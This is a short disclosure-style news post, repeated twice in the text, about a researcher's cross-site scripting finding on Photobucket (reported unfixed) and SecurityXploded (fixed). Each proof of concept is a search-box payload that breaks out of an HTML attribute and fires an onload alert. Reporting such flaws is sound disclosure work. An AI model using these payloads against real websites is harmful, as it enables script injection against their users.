A Security Researcher kuksool from n0careteam, has identified Cross site scripting security flaw in two famous websites, Photobucket and SecurityXploded.
POC for photobucket [unfixed]:
*Load http://photobucket.com/plugin/search
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
![]()
POC for SecurityXploded [FIXED]:
*Load http://securityxploded.com
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
The researcher claimed to have reported to PhotoBucket team. Let us hope they will fix the vulnerability soon.
After i sent notification to SecurityXploded, they fixed the vulnerability immediately.
POC for photobucket [unfixed]:
*Load http://photobucket.com/plugin/search
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
POC for SecurityXploded [FIXED]:
*Load http://securityxploded.com
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
The researcher claimed to have reported to PhotoBucket team. Let us hope they will fix the vulnerability soon.
After i sent notification to SecurityXploded, they fixed the vulnerability immediately.